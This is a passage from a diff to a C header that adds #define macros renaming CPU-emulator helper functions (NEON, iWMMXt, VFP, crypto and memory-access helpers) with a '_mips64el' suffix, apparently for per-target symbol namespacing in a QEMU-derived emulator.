helper_be_ldq_cmmu helper_be_ldq_cmmu_mips64el +#define helper_be_ldq_mmu helper_be_ldq_mmu_mips64el +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64el +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64el +#define helper_be_ldul_mmu helper_be_ldul_mmu_mips64el +#define helper_be_lduw_mmu helper_be_lduw_mmu_mips64el +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mips64el +#define helper_be_stl_mmu helper_be_stl_mmu_mips64el +#define helper_be_stq_mmu helper_be_stq_mmu_mips64el +#define helper_be_stw_mmu helper_be_stw_mmu_mips64el +#define helper_clear_pstate_ss helper_clear_pstate_ss_mips64el +#define helper_clz_arm helper_clz_arm_mips64el +#define helper_cpsr_read helper_cpsr_read_mips64el +#define helper_cpsr_write helper_cpsr_write_mips64el +#define helper_crc32_arm helper_crc32_arm_mips64el +#define helper_crc32c helper_crc32c_mips64el +#define helper_crypto_aese helper_crypto_aese_mips64el +#define helper_crypto_aesmc helper_crypto_aesmc_mips64el +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mips64el +#define helper_crypto_sha1h helper_crypto_sha1h_mips64el +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mips64el +#define helper_crypto_sha256h helper_crypto_sha256h_mips64el +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mips64el +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mips64el +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mips64el +#define helper_dc_zva helper_dc_zva_mips64el +#define helper_double_saturate helper_double_saturate_mips64el +#define helper_exception_internal helper_exception_internal_mips64el +#define helper_exception_return helper_exception_return_mips64el +#define helper_exception_with_syndrome helper_exception_with_syndrome_mips64el +#define helper_get_cp_reg helper_get_cp_reg_mips64el +#define helper_get_cp_reg64 helper_get_cp_reg64_mips64el +#define helper_get_r13_banked helper_get_r13_banked_mips64el +#define helper_get_user_reg helper_get_user_reg_mips64el +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mips64el +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mips64el +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mips64el +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mips64el +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mips64el +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mips64el +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mips64el +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mips64el +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mips64el +#define helper_iwmmxt_addub helper_iwmmxt_addub_mips64el +#define helper_iwmmxt_addul helper_iwmmxt_addul_mips64el +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mips64el +#define helper_iwmmxt_align helper_iwmmxt_align_mips64el +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mips64el +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mips64el +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mips64el +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mips64el +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mips64el +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mips64el +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mips64el +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mips64el +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mips64el +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mips64el +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mips64el +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mips64el +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mips64el +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mips64el +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mips64el +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mips64el +#define helper_iwmmxt_insr helper_iwmmxt_insr_mips64el +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mips64el +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mips64el +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mips64el +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mips64el +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mips64el +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mips64el +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mips64el +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mips64el +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mips64el +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mips64el +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mips64el +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mips64el +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mips64el +#define helper_iwmmxt_minub helper_iwmmxt_minub_mips64el +#define helper_iwmmxt_minul helper_iwmmxt_minul_mips64el +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mips64el +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_mips64el +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mips64el +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mips64el +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mips64el +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mips64el +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mips64el +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mips64el +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mips64el +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mips64el +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mips64el +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mips64el +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mips64el +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mips64el +#define helper_iwmmxt_packul helper_iwmmxt_packul_mips64el +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mips64el +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_mips64el +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mips64el +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mips64el +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_mips64el +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mips64el +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mips64el +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mips64el +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mips64el +#define helper_iwmmxt_slll helper_iwmmxt_slll_mips64el +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mips64el +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mips64el +#define helper_iwmmxt_sral helper_iwmmxt_sral_mips64el +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mips64el +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mips64el +#define helper_iwmmxt_srll helper_iwmmxt_srll_mips64el +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mips64el +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mips64el +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mips64el +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mips64el +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_mips64el +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mips64el +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mips64el +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_mips64el +#define helper_iwmmxt_subub helper_iwmmxt_subub_mips64el +#define helper_iwmmxt_subul helper_iwmmxt_subul_mips64el +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mips64el +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mips64el +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mips64el +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mips64el +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mips64el +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mips64el +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mips64el +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mips64el +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mips64el +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mips64el +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mips64el +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mips64el +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_mips64el +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mips64el +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mips64el +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mips64el +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mips64el +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mips64el +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mips64el +#define helper_ldb_cmmu helper_ldb_cmmu_mips64el +#define helper_ldb_mmu helper_ldb_mmu_mips64el +#define helper_ldl_cmmu helper_ldl_cmmu_mips64el +#define helper_ldl_mmu helper_ldl_mmu_mips64el +#define helper_ldq_cmmu helper_ldq_cmmu_mips64el +#define helper_ldq_mmu helper_ldq_mmu_mips64el +#define helper_ldw_cmmu helper_ldw_cmmu_mips64el +#define helper_ldw_mmu helper_ldw_mmu_mips64el +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_mips64el +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mips64el +#define helper_le_ldq_mmu helper_le_ldq_mmu_mips64el +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64el +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64el +#define helper_le_ldul_mmu helper_le_ldul_mmu_mips64el +#define helper_le_lduw_mmu helper_le_lduw_mmu_mips64el +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mips64el +#define helper_le_stl_mmu helper_le_stl_mmu_mips64el +#define helper_le_stq_mmu helper_le_stq_mmu_mips64el +#define helper_le_stw_mmu helper_le_stw_mmu_mips64el +#define helper_msr_i_pstate helper_msr_i_pstate_mips64el +#define helper_neon_abd_f32 helper_neon_abd_f32_mips64el +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mips64el +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mips64el +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mips64el +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mips64el +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mips64el +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mips64el +#define helper_neon_abd_s16 helper_neon_abd_s16_mips64el +#define helper_neon_abd_s32 helper_neon_abd_s32_mips64el +#define helper_neon_abd_s8 helper_neon_abd_s8_mips64el +#define helper_neon_abd_u16 helper_neon_abd_u16_mips64el +#define helper_neon_abd_u32 helper_neon_abd_u32_mips64el +#define helper_neon_abd_u8 helper_neon_abd_u8_mips64el +#define helper_neon_abs_s16 helper_neon_abs_s16_mips64el +#define helper_neon_abs_s8 helper_neon_abs_s8_mips64el +#define helper_neon_acge_f32 helper_neon_acge_f32_mips64el +#define helper_neon_acge_f64 helper_neon_acge_f64_mips64el +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mips64el +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mips64el +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mips64el +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mips64el +#define helper_neon_addl_u16 helper_neon_addl_u16_mips64el +#define helper_neon_addl_u32 helper_neon_addl_u32_mips64el +#define helper_neon_add_u16 helper_neon_add_u16_mips64el +#define helper_neon_add_u8 helper_neon_add_u8_mips64el +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mips64el +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mips64el +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mips64el +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mips64el +#define helper_neon_cge_f32 helper_neon_cge_f32_mips64el +#define helper_neon_cge_s16 helper_neon_cge_s16_mips64el +#define helper_neon_cge_s32 helper_neon_cge_s32_mips64el +#define helper_neon_cge_s8 helper_neon_cge_s8_mips64el +#define helper_neon_cge_u16 helper_neon_cge_u16_mips64el +#define helper_neon_cge_u32 helper_neon_cge_u32_mips64el +#define helper_neon_cge_u8 helper_neon_cge_u8_mips64el +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mips64el +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mips64el +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mips64el +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mips64el +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mips64el +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mips64el +#define helper_neon_cgt_u8 helper_neon_cgt_u8_mips64el +#define helper_neon_cls_s16 helper_neon_cls_s16_mips64el +#define helper_neon_cls_s32 helper_neon_cls_s32_mips64el +#define helper_neon_cls_s8 helper_neon_cls_s8_mips64el +#define helper_neon_clz_u16 helper_neon_clz_u16_mips64el +#define helper_neon_clz_u8 helper_neon_clz_u8_mips64el +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mips64el +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mips64el +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mips64el +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mips64el +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mips64el +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mips64el +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mips64el +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mips64el +#define helper_neon_hadd_u8 helper_neon_hadd_u8_mips64el +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mips64el +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mips64el +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mips64el +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mips64el +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mips64el +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mips64el +#define helper_neon_max_s16 helper_neon_max_s16_mips64el +#define helper_neon_max_s32 helper_neon_max_s32_mips64el +#define helper_neon_max_s8 helper_neon_max_s8_mips64el +#define helper_neon_max_u16 helper_neon_max_u16_mips64el +#define helper_neon_max_u32 helper_neon_max_u32_mips64el +#define helper_neon_max_u8 helper_neon_max_u8_mips64el +#define helper_neon_min_s16 helper_neon_min_s16_mips64el +#define helper_neon_min_s32 helper_neon_min_s32_mips64el +#define helper_neon_min_s8 helper_neon_min_s8_mips64el +#define helper_neon_min_u16 helper_neon_min_u16_mips64el +#define helper_neon_min_u32 helper_neon_min_u32_mips64el +#define helper_neon_min_u8 helper_neon_min_u8_mips64el +#define helper_neon_mull_p8 helper_neon_mull_p8_mips64el +#define helper_neon_mull_s16 helper_neon_mull_s16_mips64el +#define helper_neon_mull_s8 helper_neon_mull_s8_mips64el +#define helper_neon_mull_u16 helper_neon_mull_u16_mips64el +#define helper_neon_mull_u8 helper_neon_mull_u8_mips64el +#define helper_neon_mul_p8 helper_neon_mul_p8_mips64el +#define helper_neon_mul_u16 helper_neon_mul_u16_mips64el +#define helper_neon_mul_u8 helper_neon_mul_u8_mips64el +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mips64el +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mips64el +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mips64el +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mips64el +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mips64el +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mips64el +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mips64el +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mips64el +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mips64el +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mips64el +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mips64el +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mips64el +#define helper_neon_negl_u16 helper_neon_negl_u16_mips64el +#define helper_neon_negl_u32 helper_neon_negl_u32_mips64el +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mips64el +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mips64el +#define helper_neon_padd_u16 helper_neon_padd_u16_mips64el +#define helper_neon_padd_u8 helper_neon_padd_u8_mips64el +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mips64el +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mips64el +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mips64el +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mips64el +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mips64el +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mips64el +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mips64el +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mips64el +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mips64el +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mips64el +#define helper_neon_qabs_s16 helper_neon_qabs_s16_mips64el +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mips64el +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mips64el +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mips64el +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mips64el +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mips64el +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mips64el +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mips64el +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mips64el +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mips64el +#define helper_neon_qadd_u64 helper_neon_qadd_u64_mips64el +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mips64el +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mips64el +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mips64el +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mips64el +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mips64el +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mips64el +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mips64el +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mips64el +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mips64el +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mips64el +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mips64el +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mips64el +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mips64el +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_mips64el +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mips64el +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mips64el +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mips64el +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mips64el +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mips64el +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mips64el +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mips64el +#define helper_neon_qshl_u16 helper_neon_qshl_u16_mips64el +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mips64el +#define helper_neon_qshl_u64 helper_neon_qshl_u64_mips64el +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mips64el +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mips64el +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mips64el +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mips64el +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mips64el +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mips64el +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mips64el +#define helper_neon_qsub_s64 helper_neon_qsub_s64_mips64el +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mips64el +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mips64el +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mips64el +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mips64el +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mips64el +#define helper_neon_qunzip16 helper_neon_qunzip16_mips64el +#define helper_neon_qunzip32 helper_neon_qunzip32_mips64el +#define helper_neon_qunzip8 helper_neon_qunzip8_mips64el +#define helper_neon_qzip16 helper_neon_qzip16_mips64el +#define helper_neon_qzip32 helper_neon_qzip32_mips64el +#define helper_neon_qzip8 helper_neon_qzip8_mips64el +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mips64el +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mips64el +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mips64el +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mips64el +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mips64el +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_mips64el +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mips64el +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mips64el +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mips64el +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mips64el +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mips64el +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mips64el +#define helper_neon_rshl_u32 helper_neon_rshl_u32_mips64el +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mips64el +#define helper_neon_rshl_u8 helper_neon_rshl_u8_mips64el +#define helper_neon_shl_s16 helper_neon_shl_s16_mips64el +#define helper_neon_shl_s32 helper_neon_shl_s32_mips64el +#define helper_neon_shl_s64 helper_neon_shl_s64_mips64el +#define helper_neon_shl_s8 helper_neon_shl_s8_mips64el +#define helper_neon_shl_u16 helper_neon_shl_u16_mips64el +#define helper_neon_shl_u32 helper_neon_shl_u32_mips64el +#define helper_neon_shl_u64 helper_neon_shl_u64_mips64el +#define helper_neon_shl_u8 helper_neon_shl_u8_mips64el +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mips64el +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mips64el +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mips64el +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mips64el +#define helper_neon_subl_u16 helper_neon_subl_u16_mips64el +#define helper_neon_subl_u32 helper_neon_subl_u32_mips64el +#define helper_neon_sub_u16 helper_neon_sub_u16_mips64el +#define helper_neon_sub_u8 helper_neon_sub_u8_mips64el +#define helper_neon_tbl helper_neon_tbl_mips64el +#define helper_neon_tst_u16 helper_neon_tst_u16_mips64el +#define helper_neon_tst_u32 helper_neon_tst_u32_mips64el +#define helper_neon_tst_u8 helper_neon_tst_u8_mips64el +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mips64el +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mips64el +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mips64el +#define helper_neon_unzip16 helper_neon_unzip16_mips64el +#define helper_neon_unzip8 helper_neon_unzip8_mips64el +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mips64el +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_mips64el +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mips64el +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mips64el +#define helper_neon_widen_s16 helper_neon_widen_s16_mips64el +#define helper_neon_widen_s8 helper_neon_widen_s8_mips64el +#define helper_neon_widen_u16 helper_neon_widen_u16_mips64el +#define helper_neon_widen_u8 helper_neon_widen_u8_mips64el +#define helper_neon_zip16 helper_neon_zip16_mips64el +#define helper_neon_zip8 helper_neon_zip8_mips64el +#define helper_pre_hvc helper_pre_hvc_mips64el +#define helper_pre_smc helper_pre_smc_mips64el +#define helper_qadd16 helper_qadd16_mips64el +#define helper_qadd8 helper_qadd8_mips64el +#define helper_qaddsubx helper_qaddsubx_mips64el +#define helper_qsub16 helper_qsub16_mips64el +#define helper_qsub8 helper_qsub8_mips64el +#define helper_qsubaddx helper_qsubaddx_mips64el +#define helper_rbit helper_rbit_mips64el +#define helper_recpe_f32 helper_recpe_f32_mips64el +#define helper_recpe_f64 helper_recpe_f64_mips64el +#define helper_recpe_u32 helper_recpe_u32_mips64el +#define helper_recps_f32 helper_recps_f32_mips64el +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mips64el +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64el +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64el +#define helper_ret_stb_mmu helper_ret_stb_mmu_mips64el +#define helper_rintd helper_rintd_mips64el +#define helper_rintd_exact helper_rintd_exact_mips64el +#define helper_rints helper_rints_mips64el +#define helper_rints_exact helper_rints_exact_mips64el +#define helper_ror_cc helper_ror_cc_mips64el +#define helper_rsqrte_f32 helper_rsqrte_f32_mips64el +#define helper_rsqrte_f64 helper_rsqrte_f64_mips64el +#define helper_rsqrte_u32 helper_rsqrte_u32_mips64el +#define helper_rsqrts_f32 helper_rsqrts_f32_mips64el +#define helper_sadd16 helper_sadd16_mips64el +#define helper_sadd8 helper_sadd8_mips64el +#define helper_saddsubx helper_saddsubx_mips64el +#define helper_sar_cc helper_sar_cc_mips64el +#define helper_sdiv helper_sdiv_mips64el +#define helper_sel_flags helper_sel_flags_mips64el +#define helper_set_cp_reg helper_set_cp_reg_mips64el +#define helper_set_cp_reg64 helper_set_cp_reg64_mips64el +#define helper_set_neon_rmode helper_set_neon_rmode_mips64el +#define helper_set_r13_banked helper_set_r13_banked_mips64el +#define helper_set_rmode helper_set_rmode_mips64el +#define helper_set_user_reg helper_set_user_reg_mips64el +#define helper_shadd16 helper_shadd16_mips64el +#define helper_shadd8 helper_shadd8_mips64el +#define helper_shaddsubx helper_shaddsubx_mips64el +#define helper_shl_cc helper_shl_cc_mips64el +#define helper_shr_cc helper_shr_cc_mips64el +#define helper_shsub16 helper_shsub16_mips64el +#define helper_shsub8 helper_shsub8_mips64el +#define helper_shsubaddx helper_shsubaddx_mips64el +#define helper_ssat helper_ssat_mips64el +#define helper_ssat16 helper_ssat16_mips64el +#define helper_ssub16 helper_ssub16_mips64el +#define helper_ssub8 helper_ssub8_mips64el +#define helper_ssubaddx helper_ssubaddx_mips64el +#define helper_stb_mmu helper_stb_mmu_mips64el +#define helper_stl_mmu helper_stl_mmu_mips64el +#define helper_stq_mmu helper_stq_mmu_mips64el +#define helper_stw_mmu helper_stw_mmu_mips64el +#define helper_sub_saturate helper_sub_saturate_mips64el +#define helper_sub_usaturate helper_sub_usaturate_mips64el +#define helper_sxtb16 helper_sxtb16_mips64el +#define helper_uadd16 helper_uadd16_mips64el +#define helper_uadd8 helper_uadd8_mips64el +#define helper_uaddsubx helper_uaddsubx_mips64el +#define helper_udiv helper_udiv_mips64el +#define helper_uhadd16 helper_uhadd16_mips64el +#define helper_uhadd8 helper_uhadd8_mips64el +#define helper_uhaddsubx helper_uhaddsubx_mips64el +#define helper_uhsub16 helper_uhsub16_mips64el +#define helper_uhsub8 helper_uhsub8_mips64el +#define helper_uhsubaddx helper_uhsubaddx_mips64el +#define helper_uqadd16 helper_uqadd16_mips64el +#define helper_uqadd8 helper_uqadd8_mips64el +#define helper_uqaddsubx helper_uqaddsubx_mips64el +#define helper_uqsub16 helper_uqsub16_mips64el +#define helper_uqsub8 helper_uqsub8_mips64el +#define helper_uqsubaddx helper_uqsubaddx_mips64el +#define helper_usad8 helper_usad8_mips64el +#define helper_usat helper_usat_mips64el +#define helper_usat16 helper_usat16_mips64el +#define helper_usub16 helper_usub16_mips64el +#define helper_usub8 helper_usub8_mips64el +#define helper_usubaddx helper_usubaddx_mips64el +#define helper_uxtb16 helper_uxtb16_mips64el +#define helper_v7m_mrs helper_v7m_mrs_mips64el +#define helper_v7m_msr helper_v7m_msr_mips64el +#define helper_vfp_absd helper_vfp_absd_mips64el +#define helper_vfp_abss helper_vfp_abss_mips64el +#define helper_vfp_addd helper_vfp_addd_mips64el +#define helper_vfp_adds helper_vfp_adds_mips64el +#define helper_vfp_cmpd helper_vfp_cmpd_mips64el +#define helper_vfp_cmped helper_vfp_cmped_mips64el +#define helper_vfp_cmpes helper_vfp_cmpes_mips64el +#define helper_vfp_cmps helper_vfp_cmps_mips64el +#define helper_vfp_divd helper_vfp_divd_mips64el +#define helper_vfp_divs helper_vfp_divs_mips64el +#define helper_vfp_fcvtds helper_vfp_fcvtds_mips64el +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mips64el +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mips64el +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mips64el +#define helper_vfp_fcvt_f64_to_f16 